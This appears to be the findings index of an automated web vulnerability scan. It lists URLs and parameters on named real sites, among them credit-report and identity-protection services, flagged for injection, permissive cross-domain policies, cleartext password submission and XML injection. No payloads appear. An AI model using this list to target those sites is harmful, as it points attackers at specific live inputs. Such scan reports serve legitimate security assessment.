6.311. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js [REST URL parameter 6]

6.312. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js [REST URL parameter 7]

6.313. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/superfish.js [REST URL parameter 1]

6.314. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/superfish.js [REST URL parameter 2]

6.315. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/superfish.js [REST URL parameter 3]

6.316. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/superfish.js [REST URL parameter 4]

6.317. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/superfish.js [REST URL parameter 5]

6.318. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/superfish.js [REST URL parameter 6]

6.319. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/superfish.js [REST URL parameter 7]

6.320. http://www.fightidentitytheft.com/sites/all/themes/fightid/jquery.domec.js [REST URL parameter 1]

6.321. http://www.fightidentitytheft.com/sites/all/themes/fightid/jquery.domec.js [REST URL parameter 2]

6.322. http://www.fightidentitytheft.com/sites/all/themes/fightid/jquery.domec.js [REST URL parameter 3]

6.323. http://www.fightidentitytheft.com/sites/all/themes/fightid/jquery.domec.js [REST URL parameter 4]

6.324. http://www.fightidentitytheft.com/sites/all/themes/fightid/jquery.domec.js [REST URL parameter 5]

6.325. http://www.fightidentitytheft.com/sites/all/themes/fightid/script.js [REST URL parameter 1]

6.326. http://www.fightidentitytheft.com/sites/all/themes/fightid/script.js [REST URL parameter 2]

6.327. http://www.fightidentitytheft.com/sites/all/themes/fightid/script.js [REST URL parameter 3]

6.328. http://www.fightidentitytheft.com/sites/all/themes/fightid/script.js [REST URL parameter 4]

6.329. http://www.fightidentitytheft.com/sites/all/themes/fightid/script.js [REST URL parameter 5]

6.330. http://www.flexibilitytheme.com/images/link.gif [REST URL parameter 1]

6.331. http://www.gfk.com/PHP_Includes/embed.js.php [width parameter]

6.332. http://www.hellonetwork.com/ypsearch.cfm [kw parameter]

6.333. http://www.hellonetwork.com/ypsearch.cfm [kw parameter]

6.334. http://www.hellonetwork.com/ypsearch.cfm [kw parameter]

6.335. http://www.hellonetwork.com/ypsearch.cfm [kw parameter]

6.336. http://www.lifelock.com/offers/faces/female/ [promocodehide parameter]

6.337. http://www.neudesicmediagroup.com/Advertising.aspx [site parameter]

6.338. http://www.nextadvisor.com/credit_report_monitoring/compare.php [REST URL parameter 1]

6.339. http://www.nextadvisor.com/credit_report_monitoring/compare.php [REST URL parameter 1]

6.340. http://www.nextadvisor.com/credit_report_monitoring/compare.php [REST URL parameter 2]

6.341. http://www.nextadvisor.com/credit_report_monitoring/compare.php [a parameter]

6.342. http://www.nextadvisor.com/credit_report_monitoring/compare.php [gclid parameter]

6.343. http://www.nextadvisor.com/credit_report_monitoring/compare.php [h1 parameter]

6.344. http://www.nextadvisor.com/credit_report_monitoring/compare.php [kw parameter]

6.345. http://www.nextadvisor.com/credit_report_monitoring/compare.php [name of an arbitrarily supplied request parameter]

6.346. http://www.nextadvisor.com/credit_report_monitoring/free_credit_score_review.php [REST URL parameter 1]

6.347. http://www.nextadvisor.com/credit_report_monitoring/free_credit_score_review.php [REST URL parameter 1]

6.348. http://www.nextadvisor.com/credit_report_monitoring/free_credit_score_review.php [REST URL parameter 2]

6.349. http://www.nextadvisor.com/favicon.ico [REST URL parameter 1]

6.350. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 1]

6.351. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 2]

6.352. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 2]

6.353. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 3]

6.354. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 1]

6.355. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 2]

6.356. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 2]

6.357. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 3]

6.358. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]

6.359. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]

6.360. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 2]

6.361. http://www.nextadvisor.com/link.php [REST URL parameter 1]

6.362. http://www.nextadvisor.com/pmid [REST URL parameter 1]

6.363. http://www.nextadvisor.com/pmid [kw parameter]

6.364. http://www.nextadvisor.com/pmid/ [REST URL parameter 1]

6.365. http://www.nextadvisor.com/pmid/ [REST URL parameter 1]

6.366. http://www.nextadvisor.com/pmid/ [kw parameter]

6.367. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 1]

6.368. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 2]

6.369. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 2]

6.370. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 3]

6.371. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 1]

6.372. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 2]

6.373. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 2]

6.374. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 3]

6.375. http://www.nextadvisor.com/pmid/style.css [REST URL parameter 1]

6.376. http://www.nextadvisor.com/pmid/style.css [REST URL parameter 1]

6.377. http://www.nextadvisor.com/pmid/style.css [REST URL parameter 2]

6.378. http://www.oracle.com/dm/design/events/images/spacer.gif [REST URL parameter 2]

6.379. http://www.oracle.com/dm/design/events/images/spacer.gif [REST URL parameter 3]

6.380. http://www.oracle.com/dm/design/events/images/spacer.gif [REST URL parameter 4]

6.381. http://www.pcworld.com/pcworldconnect/comment_registration [callingurl parameter]

6.382. http://www.positivesearchresults.com/templates/gk_corporate/lib/scripts/menu.php [speed parameter]

6.383. http://www.reputationengineer.com/wp-content/plugins/cforms/lib_ajax.php [rs parameter]

6.384. http://www.reputationmanagementconsultants.com/ [gclid parameter]

6.385. http://www.reputationmanagementconsultants.com/ [utm_campaign parameter]

6.386. http://www.reputationmanagementconsultants.com/ [utm_content parameter]

6.387. http://www.reputationmanagementconsultants.com/ [utm_medium parameter]

6.388. http://www.reputationmanagementconsultants.com/ [utm_source parameter]

6.389. http://www.reputationmanagementconsultants.com/ [utm_term parameter]

6.390. https://www.senderscore.org/landing/ppcregistration/index.php [campid parameter]

6.391. https://www.senderscore.org/landing/ppcregistration/index.php [gclid parameter]

6.392. https://www.senderscore.org/landing/ppcregistration/index.php [name of an arbitrarily supplied request parameter]

6.393. https://www.senderscore.org/landing/ppcregistration/index.php [s_kwcid parameter]

6.394. http://www.swisscom.ch/res/hilfe/kontakt/index.htm [name of an arbitrarily supplied request parameter]

6.395. http://www.swisscom.ch/res/hilfe/kontakt/index.htm [name of an arbitrarily supplied request parameter]

6.396. http://www.swisscom.ch/res/hilfe/kontakt/index.htm [name of an arbitrarily supplied request parameter]

6.397. https://www.trustedid.com/idfide01/ [promoCodeRefIde parameter]

6.398. https://www.trustedid.com/idfide01/ [promoCodeRefIde parameter]

6.399. https://www.trustedid.com/idfide01/ [promoCodeRefIdf parameter]

6.400. https://www.trustedid.com/suzeidprotector/ [email parameter]

6.401. https://www.trustedid.com/suzeidprotector/ [first_name parameter]

6.402. https://www.trustedid.com/suzeidprotector/ [last_name parameter]

6.403. http://www.upsellit.com/upsellitJS4.jsp [qs parameter]

6.404. http://www.upsellit.com/upsellitJS4.jsp [trackingInfo parameter]

6.405. http://www.hotelclub.com/ [Referer HTTP header]

6.406. http://www.nextadvisor.com/credit_report_monitoring/compare.php [Referer HTTP header]

6.407. http://www.nextadvisor.com/link.php [Referer HTTP header]

6.408. http://www.nextadvisor.com/pmid [Referer HTTP header]

6.409. http://www.nextadvisor.com/pmid/ [Referer HTTP header]

6.410. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

6.411. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

6.412. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

6.413. http://ar.voicefive.com/bmx3/broker.pli [ar_p86169922 cookie]

6.414. http://ar.voicefive.com/bmx3/broker.pli [ar_p86204458 cookie]

6.415. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

6.416. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

6.417. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

6.418. http://ar.voicefive.com/bmx3/survey_splash.pli [BMX_3PC cookie]

6.419. http://ar.voicefive.com/bmx3/survey_splash.pli [BMX_G cookie]

6.420. http://ar.voicefive.com/bmx3/survey_splash.pli [UID cookie]

6.421. http://ar.voicefive.com/bmx3/survey_splash.pli [ar_p81479006 cookie]

6.422. http://ar.voicefive.com/bmx3/survey_splash.pli [ar_p90175839 cookie]

6.423. http://ar.voicefive.com/bmx3/survey_splash.pli [ar_p91300630 cookie]

6.424. http://ar.voicefive.com/bmx3/survey_splash.pli [ar_p97174789 cookie]

6.425. http://ar.voicefive.com/bmx3/survey_splash.pli [ar_s_p81479006 cookie]

6.426. http://breathe.c3metrics.com/c3realview.js [C3UID cookie]

6.427. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [ZEDOIDA cookie]

6.428. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [ZEDOIDA cookie]

6.429. http://d7.zedo.com/bar/v16-405/d2/jsc/fmr.js [ZEDOIDA cookie]

6.430. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [ZEDOIDA cookie]

6.431. http://s18.sitemeter.com/js/counter.asp [IP cookie]

6.432. http://s18.sitemeter.com/js/counter.js [IP cookie]

6.433. http://seg.sharethis.com/getSegment.php [__stid cookie]

6.434. http://www.creditchecktotal.com/Login.aspx [SiteID parameter]

6.435. http://www.creditchecktotal.com/Login.aspx [SiteVersionID parameter]

6.436. http://www.creditchecktotal.com/Login.aspx [bcd parameter]

6.437. http://www.creditchecktotal.com/Login.aspx [name of an arbitrarily supplied request parameter]

6.438. http://www.creditchecktotal.com/Login.aspx [sc parameter]

6.439. http://www.creditchecktotal.com/Order1.aspx [SiteID parameter]

6.440. http://www.creditchecktotal.com/Order1.aspx [SiteVersionID parameter]

6.441. http://www.creditchecktotal.com/Order1.aspx [areaid parameter]

6.442. http://www.creditchecktotal.com/Order1.aspx [bcd parameter]

6.443. http://www.creditchecktotal.com/Order1.aspx [name of an arbitrarily supplied request parameter]

6.444. http://www.creditchecktotal.com/Order1.aspx [pkgid parameter]

6.445. http://www.creditchecktotal.com/Order1.aspx [sc parameter]

6.446. http://www.creditreport.com/dni/Order1.aspx [REST URL parameter 1]

6.447. http://www.creditreport.com/dni/Order1.aspx [SiteID parameter]

6.448. http://www.creditreport.com/dni/Order1.aspx [SiteVersionID parameter]

6.449. http://www.creditreport.com/dni/Order1.aspx [areaid parameter]

6.450. http://www.creditreport.com/dni/Order1.aspx [bcd parameter]

6.451. http://www.creditreport.com/dni/Order1.aspx [name of an arbitrarily supplied request parameter]

6.452. http://www.creditreport.com/dni/Order1.aspx [pkgid parameter]

6.453. http://www.creditreport.com/dni/Order1.aspx [sc parameter]

6.454. http://www.experiandirect.com/triplealert/Order1.aspx [SiteID parameter]

6.455. http://www.experiandirect.com/triplealert/Order1.aspx [SiteVersionID parameter]

6.456. http://www.experiandirect.com/triplealert/Order1.aspx [areaid parameter]

6.457. http://www.experiandirect.com/triplealert/Order1.aspx [bcd parameter]

6.458. http://www.experiandirect.com/triplealert/Order1.aspx [name of an arbitrarily supplied request parameter]

6.459. http://www.experiandirect.com/triplealert/Order1.aspx [pkgid parameter]

6.460. http://www.experiandirect.com/triplealert/Order1.aspx [sc parameter]

6.461. http://www.infusionsoft.com/demo [LeadSource cookie]

6.462. http://www.lifelock.com/about/leadership/management/ [LifeLockEnrollment cookie]

6.463. http://www.lifelock.com/about/lifelock-in-the-community/ [LifeLockEnrollment cookie]

6.464. http://www.lifelock.com/guarantee/ [LifeLockEnrollment cookie]

6.465. http://www.lifelock.com/how-it-works/ [LifeLockEnrollment cookie]

6.466. http://www.lifelock.com/identity-theft/ [LifeLockEnrollment cookie]

6.467. http://www.lifelock.com/lifelock-for-people [LifeLockEnrollment cookie]

6.468. http://www.lifelock.com/lifelock-for-people [LifeLockEnrollment cookie]

6.469. http://www.lifelock.com/offers/faces/female/ [LifeLockEnrollment cookie]

6.470. http://www.lifelock.com/offers/faces/female/ [LifeLockEnrollment cookie]

6.471. http://www.lifelock.com/services/ [LifeLockEnrollment cookie]

6.472. http://www.lifelock.com/services/ [LifeLockEnrollment cookie]

6.473. http://www.lifelock.com/services/command-center/ [LifeLockEnrollment cookie]

6.474. http://www.lifelock.com/services/command-center/ [LifeLockEnrollment cookie]

7. Flash cross-domain policy

7.1. http://0.gravatar.com/crossdomain.xml

7.2. http://2byto.com/crossdomain.xml

7.3. http://4.bp.blogspot.com/crossdomain.xml

7.4. http://a.tribalfusion.com/crossdomain.xml

7.5. http://action.mathtag.com/crossdomain.xml

7.6. http://ad-emea.doubleclick.net/crossdomain.xml

7.7. http://ad.amgdgt.com/crossdomain.xml

7.8. http://ad.doubleclick.net/crossdomain.xml

7.9. http://adfarm1.adition.com/crossdomain.xml

7.10. http://ads.pointroll.com/crossdomain.xml

7.11. http://adsfac.us/crossdomain.xml

7.12. http://ajax.googleapis.com/crossdomain.xml

7.13. http://altfarm.mediaplex.com/crossdomain.xml

7.14. http://analytic.hotelclub.com/crossdomain.xml

7.15. http://api.ak.facebook.com/crossdomain.xml

7.16. http://api.facebook.com/crossdomain.xml

7.17. http://ar.voicefive.com/crossdomain.xml

7.18. http://at.amgdgt.com/crossdomain.xml

7.19. http://b.scorecardresearch.com/crossdomain.xml

7.20. http://b.voicefive.com/crossdomain.xml

7.21. http://b3.mookie1.com/crossdomain.xml

7.22. http://beacon.afy11.net/crossdomain.xml

7.23. http://bh.contextweb.com/crossdomain.xml

7.24. http://bp.specificclick.net/crossdomain.xml

7.25. http://by.optimost.com/crossdomain.xml

7.26. http://c.betrad.com/crossdomain.xml

7.27. http://cdn.gigya.com/crossdomain.xml

7.28. http://cdn.w55c.net/crossdomain.xml

7.29. http://clk.atdmt.com/crossdomain.xml

7.30. http://consumerinfo.tt.omtrdc.net/crossdomain.xml

7.31. http://cspix.media6degrees.com/crossdomain.xml

7.32. http://ctix8.cheaptickets.com/crossdomain.xml

7.33. http://d.w55c.net/crossdomain.xml

7.34. http://data.coremetrics.com/crossdomain.xml

7.35. http://dm.de.mookie1.com/crossdomain.xml

7.36. http://dogtime.com/crossdomain.xml

7.37. http://ec.atdmt.com/crossdomain.xml

7.38. http://ehg-swisscom.hitbox.com/crossdomain.xml

7.39. http://equfx.netmng.com/crossdomain.xml

7.40. http://equifaxps.122.2o7.net/crossdomain.xml

7.41. http://event.adxpose.com/crossdomain.xml

7.42. http://exch.quantserve.com/crossdomain.xml

7.43. http://feeds.delicious.com/crossdomain.xml

7.44. http://fls.doubleclick.net/crossdomain.xml

7.45. http://gravatar.com/crossdomain.xml

7.46. http://gscounters.gigya.com/crossdomain.xml

7.47. http://i.xx.openx.com/crossdomain.xml

7.48. http://ib.adnxs.com/crossdomain.xml

7.49. http://idcs.interclick.com/crossdomain.xml

7.50. http://img.mediaplex.com/crossdomain.xml

7.51. http://img1.wsimg.com/crossdomain.xml

7.52. http://img3.wsimg.com/crossdomain.xml

7.53. http://l.betrad.com/crossdomain.xml

7.54. http://leads.demandbase.com/crossdomain.xml

7.55. http://log30.doubleverify.com/crossdomain.xml

7.56. http://m.adnxs.com/crossdomain.xml

7.57. http://media.fastclick.net/crossdomain.xml

7.58. http://metrics.citibank.com/crossdomain.xml

7.59. http://microsoftsto.112.2o7.net/crossdomain.xml

7.60. http://now.eloqua.com/crossdomain.xml

7.61. http://o.swisscom.ch/crossdomain.xml

7.62. http://omni.pcworld.com/crossdomain.xml

7.63. http://oracleglobal.112.2o7.net/crossdomain.xml

7.64. http://pixel.33across.com/crossdomain.xml

7.65. http://pixel.quantserve.com/crossdomain.xml

7.66. http://r.turn.com/crossdomain.xml

7.67. http://roia.biz/crossdomain.xml

7.68. http://s0.2mdn.net/crossdomain.xml

7.69. http://s1.2mdn.net/crossdomain.xml

7.70. http://search.twitter.com/crossdomain.xml

7.71. http://secure-us.imrworldwide.com/crossdomain.xml

7.72. http://sensic.net/crossdomain.xml

7.73. http://smetrics.freecreditreport.com/crossdomain.xml

7.74. http://spe.atdmt.com/crossdomain.xml

7.75. http://speed.pointroll.com/crossdomain.xml

7.76. http://switch.atdmt.com/crossdomain.xml

7.77. http://testdata.coremetrics.com/crossdomain.xml

7.78. http://tracking.keywordmax.com/crossdomain.xml

7.79. http://transunioninteractive.122.2o7.net/crossdomain.xml

7.80. http://www.dictof.com/crossdomain.xml

7.81. http://www.pcworld.com/crossdomain.xml

7.82. http://api.tweetmeme.com/crossdomain.xml

7.83. http://de.swisscom.ch/crossdomain.xml

7.84. http://feeds.bbci.co.uk/crossdomain.xml

7.85. http://googleads.g.doubleclick.net/crossdomain.xml

7.86. http://i35.tinypic.com/crossdomain.xml

7.87. http://newsrss.bbc.co.uk/crossdomain.xml

7.88. http://pagead2.googlesyndication.com/crossdomain.xml

7.89. http://partners.nextadnetwork.com/crossdomain.xml

7.90. http://pubads.g.doubleclick.net/crossdomain.xml

7.91. http://www.apmebf.com/crossdomain.xml

7.92. http://www.bluewin.ch/crossdomain.xml

7.93. http://www.connect.facebook.com/crossdomain.xml

7.94. http://www.credit.com/crossdomain.xml

7.95. https://www.credit.com/crossdomain.xml

7.96. http://www.emjcd.com/crossdomain.xml

7.97. https://www.facebook.com/crossdomain.xml

7.98. http://www.ftjcfx.com/crossdomain.xml

7.99. http://www.kqzyfj.com/crossdomain.xml

7.100. http://www.lduhtrp.net/crossdomain.xml

7.101. https://www.paypal.com/crossdomain.xml

7.102. http://www.securepaynet.net/crossdomain.xml

7.103. https://www.securepaynet.net/crossdomain.xml

7.104. http://www.tqlkg.com/crossdomain.xml

7.105. http://citi.bridgetrack.com/crossdomain.xml

7.106. http://fightidentitytheft.hubspot.com/crossdomain.xml

7.107. http://media.compete.com/crossdomain.xml

7.108. http://swisscom-streaming-img.1st.ch/crossdomain.xml

8. Silverlight cross-domain policy

8.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml

8.2. http://ad.doubleclick.net/clientaccesspolicy.xml

8.3. http://ads.pointroll.com/clientaccesspolicy.xml

8.4. http://analytic.hotelclub.com/clientaccesspolicy.xml

8.5. http://b.scorecardresearch.com/clientaccesspolicy.xml

8.6. http://b.voicefive.com/clientaccesspolicy.xml

8.7. http://clk.atdmt.com/clientaccesspolicy.xml

8.8. http://ec.atdmt.com/clientaccesspolicy.xml

8.9. http://equifaxps.122.2o7.net/clientaccesspolicy.xml

8.10. http://metrics.citibank.com/clientaccesspolicy.xml

8.11. http://microsoftsto.112.2o7.net/clientaccesspolicy.xml

8.12. http://o.swisscom.ch/clientaccesspolicy.xml

8.13. http://omni.pcworld.com/clientaccesspolicy.xml

8.14. http://oracleglobal.112.2o7.net/clientaccesspolicy.xml

8.15. http://pixel.33across.com/clientaccesspolicy.xml

8.16. http://s0.2mdn.net/clientaccesspolicy.xml

8.17. http://s1.2mdn.net/clientaccesspolicy.xml

8.18. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

8.19. http://smetrics.freecreditreport.com/clientaccesspolicy.xml

8.20. http://spe.atdmt.com/clientaccesspolicy.xml

8.21. http://speed.pointroll.com/clientaccesspolicy.xml

8.22. http://switch.atdmt.com/clientaccesspolicy.xml

8.23. http://transunioninteractive.122.2o7.net/clientaccesspolicy.xml

8.24. http://ts1.mm.bing.net/clientaccesspolicy.xml

8.25. http://ts2.mm.bing.net/clientaccesspolicy.xml

8.26. http://www.silverlight.net/clientaccesspolicy.xml

9. Cleartext submission of password

9.1. http://controlcase.com/change_password.php

9.2. http://controlcase.com/logon_page.php

9.3. http://engine03.echomail.com/icomee-regs/trial/MonitoringTrial.jsp

9.4. http://engine03.echomail.com/icomee-regs/trial/QuickTrial.jsp

9.5. http://www.dictof.com/

9.6. http://www.dictof.com/login/

9.7. http://www.gcpowertools.com/Login.aspx

9.8. http://www.gcpowertools.com/Register.aspx

9.9. http://www.infusionblog.com/

9.10. http://www.infusionsoft.com/

9.11. http://www.infusionsoft.com/about

9.12. http://www.infusionsoft.com/clients

9.13. http://www.infusionsoft.com/demo

9.14. http://www.infusionsoft.com/pricing

9.15. http://www.pcworld.com/pcworldconnect/comment_registration

9.16. http://www.positivesearchresults.com/

9.17. http://www.positivesearchresults.com/

10. XML injection

10.1. http://2byto.com/bluepixel/cnt-gif1x1.php [REST URL parameter 1]

10.2. http://2byto.com/bluepixel/cnt-gif1x1.php [REST URL parameter 2]

10.3. http://api.ak.facebook.com/restserver.php [format parameter]

10.4. http://api.facebook.com/restserver.php [format parameter]

10.5. http://api.tweetmeme.com/url_info.jsonc [REST URL parameter 1]

10.6. http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html [REST URL parameter 1]

10.7. http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html [REST URL parameter 2]

10.8. http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html [REST URL parameter 1]

10.9. http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html [REST URL parameter 2]

10.10. http://cdn.w55c.net/i/0RphY9og2j_721933665.html [REST URL parameter 1]

10.11. http://cdn.w55c.net/i/0RphY9og2j_721933665.html [REST URL parameter 2]

10.12. http://cdn.w55c.net/i/0RuFuATqDZ_452086828.html [REST URL parameter 1]

10.13. http://cdn.w55c.net/i/0RuFuATqDZ_452086828.html [REST URL parameter 2]

10.14. http://controlcase.com/aboutUs_careers.html [REST URL parameter 1]

10.15. http://controlcase.com/aboutUs_companybackground.html [REST URL parameter 1]

10.16. http://controlcase.com/aboutUs_companybackground.php [REST URL parameter 1]

10.17. http://controlcase.com/aboutUs_location.html [REST URL parameter 1]

10.18. http://controlcase.com/articles.htm [REST URL parameter 1]

10.19. http://controlcase.com/asset_vulnerability_manager.htm [REST URL parameter 1]

10.20. http://controlcase.com/audit_manager.htm [REST URL parameter 1]

10.21. http://controlcase.com/certification_bits_shared_assessments.html [REST URL parameter 1]

10.22. http://controlcase.com/certification_ei3pa.html [REST URL parameter 1]

10.23. http://controlcase.com/certification_tg3.html [REST URL parameter 1]

10.24. http://controlcase.com/certification_vulnerability_scans.html [REST URL parameter 1]

10.25. http://controlcase.com/compliance_manager.htm [REST URL parameter 1]

10.26. http://controlcase.com/compliance_manager.php [REST URL parameter 1]

10.27. http://controlcase.com/compliance_scanner.htm [REST URL parameter 1]

10.28. http://controlcase.com/css/pciscans.css [REST URL parameter 1]

10.29. http://controlcase.com/css/pciscans.css [REST URL parameter 2]

10.30. http://controlcase.com/css/style.css [REST URL parameter 1]

10.31. http://controlcase.com/css/style.css [REST URL parameter 2]

10.32. http://controlcase.com/data_discovery.htm [REST URL parameter 1]

10.33. http://controlcase.com/data_discovery.php [REST URL parameter 1]

10.34. http://controlcase.com/events_pr.htm [REST URL parameter 1]

10.35. http://controlcase.com/favicon.ico [REST URL parameter 1]

10.36. http://controlcase.com/financial_gapanalysis_certification.html [REST URL parameter 1]

10.37. http://controlcase.com/flashbanner/js/swfobject.js [REST URL parameter 1]

10.38. http://controlcase.com/flashbanner/js/swfobject.js [REST URL parameter 2]

10.39. http://controlcase.com/flashbanner/js/swfobject.js [REST URL parameter 3]

10.40. http://controlcase.com/flashbanner/preview.swf [REST URL parameter 1]

10.41. http://controlcase.com/flashbanner/preview.swf [REST URL parameter 2]

10.42. http://controlcase.com/industry_developer_gapanalysis_certification.html [REST URL parameter 1]

10.43. http://controlcase.com/industry_financial_vulnerability_scans.html [REST URL parameter 1]

10.44. http://controlcase.com/industry_merchant_gapanalysis_certification.html [REST URL parameter 1]

10.45. http://controlcase.com/industry_merchant_vendor_management.html [REST URL parameter 1]

10.46. http://controlcase.com/industry_merchant_vulnerability_scans.html [REST URL parameter 1]

10.47. http://controlcase.com/it-grc.htm [REST URL parameter 1]

10.48. http://controlcase.com/it-grc.php [REST URL parameter 1]

10.49. http://controlcase.com/js/anylinkmenu.js [REST URL parameter 1]

10.50. http://controlcase.com/js/anylinkmenu.js [REST URL parameter 2]

10.51. http://controlcase.com/js/banner.js [REST URL parameter 1]

10.52. http://controlcase.com/js/banner.js [REST URL parameter 2]

10.53. http://controlcase.com/js/jquery.js [REST URL parameter 1]

10.54. http://controlcase.com/js/jquery.js [REST URL parameter 2]

10.55. http://controlcase.com/js/md5.js [REST URL parameter 1]

10.56. http://controlcase.com/js/md5.js [REST URL parameter 2]

10.57. http://controlcase.com/js/menu.js [REST URL parameter 1]

10.58. http://controlcase.com/js/menu.js [REST URL parameter 2]

10.59. http://controlcase.com/js/menucontents.js [REST URL parameter 1]

10.60. http://controlcase.com/js/menucontents.js [REST URL parameter 2]

10.61. http://controlcase.com/js/special_functions.js [REST URL parameter 1]

10.62. http://controlcase.com/js/special_functions.js [REST URL parameter 2]

10.63. http://controlcase.com/managed_compliance_application_reviews.html [REST URL parameter 1]

10.64. http://controlcase.com/managed_compliance_application_training.html [REST URL parameter 1]

10.65. http://controlcase.com/managed_compliance_discovery_scans.html [REST URL parameter 1]

10.66. http://controlcase.com/managed_compliance_firewall_reviews.html [REST URL parameter 1]

10.67. http://controlcase.com/managed_compliance_int_vulnerability_scan.html [REST URL parameter 1]

10.68. http://controlcase.com/managed_compliance_pci_vulnerability_scan.html [REST URL parameter 1]

10.69. http://controlcase.com/managed_compliance_penetration_test.html [REST URL parameter 1]

10.70. http://controlcase.com/managed_compliance_security_monitoring.html [REST URL parameter 1]

10.71. http://controlcase.com/managed_compliance_services.htm [REST URL parameter 1]

10.72. http://controlcase.com/managed_compliance_services.php [REST URL parameter 1]

10.73. http://controlcase.com/managed_compliance_user_reviews.html [REST URL parameter 1]

10.74. http://controlcase.com/managed_compliance_vrm.html [REST URL parameter 1]

10.75. http://controlcase.com/menu/menu.css [REST URL parameter 1]

10.76. http://controlcase.com/menu/menu.css [REST URL parameter 2]

10.77. http://controlcase.com/merchant_compliance_manager.htm [REST URL parameter 1]

10.78. http://controlcase.com/merchant_compliance_program.html [REST URL parameter 1]

10.79. http://controlcase.com/news_pr.htm [REST URL parameter 1]

10.80. http://controlcase.com/notice_legal.htm [REST URL parameter 1]

10.81. http://controlcase.com/notice_privacy.htm [REST URL parameter 1]

10.82. http://controlcase.com/pa_certification.html [REST URL parameter 1]

10.83. http://controlcase.com/pa_certification.php [REST URL parameter 1]

10.84. http://controlcase.com/partner_pci_dss_services.html [REST URL parameter 1]

10.85. http://controlcase.com/partner_product_sales.html [REST URL parameter 1]

10.86. http://controlcase.com/pci.php [REST URL parameter 1]

10.87. http://controlcase.com/pci_certification.html [REST URL parameter 1]

10.88. http://controlcase.com/pci_certification.php [REST URL parameter 1]

10.89. http://controlcase.com/pci_dss_certification_gapanalysis.html [REST URL parameter 1]

10.90. http://controlcase.com/pci_dss_vulnerability_scans.html [REST URL parameter 1]

10.91. http://controlcase.com/pci_vulnerability_scans.php [REST URL parameter 1]

10.92. http://controlcase.com/policy_manager.htm [REST URL parameter 1]

10.93. http://controlcase.com/process_contact.php [REST URL parameter 1]

10.94. http://controlcase.com/process_form_DL.php [REST URL parameter 1]

10.95. http://controlcase.com/process_form_PW.php [REST URL parameter 1]

10.96. http://controlcase.com/process_reg_form_new_user.php [REST URL parameter 1]

10.97. http://controlcase.com/product_incident_manager.htm [REST URL parameter 1]

10.98. http://controlcase.com/professional_app_security_services.html [REST URL parameter 1]

10.99. http://controlcase.com/professional_app_security_services.php [REST URL parameter 1]

10.100. http://controlcase.com/professional_pa_gapanalysis.html [REST URL parameter 1]

10.101. http://controlcase.com/professional_pci_gapanalysis.html [REST URL parameter 1]

10.102. http://controlcase.com/professional_pen_services.html [REST URL parameter 1]

10.103. http://controlcase.com/professional_pen_services.php [REST URL parameter 1]

10.104. http://controlcase.com/professional_vendor_management.html [REST URL parameter 1]

10.105. http://controlcase.com/professional_vulnerability_scan_services.html [REST URL parameter 1]

10.106. http://controlcase.com/resource_collateral.htm [REST URL parameter 1]

10.107. http://controlcase.com/software.php [REST URL parameter 1]

10.108. http://controlcase.com/software_vendor_manager.htm [REST URL parameter 1]

10.109. http://controlcase.com/software_vendor_manager.php [REST URL parameter 1]

10.110. http://controlcase.com/team.php [REST URL parameter 1]

10.111. http://data.whicdn.com/images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg [REST URL parameter 1]

10.112. http://data.whicdn.com/images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg [REST URL parameter 2]

10.113. http://data.whicdn.com/images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg [REST URL parameter 3]

10.114. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 1]

10.115. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 2]

10.116. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 3]

10.117. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 4]

10.118. http://home.controlcase.com/piwik/piwik.php [REST URL parameter 1]

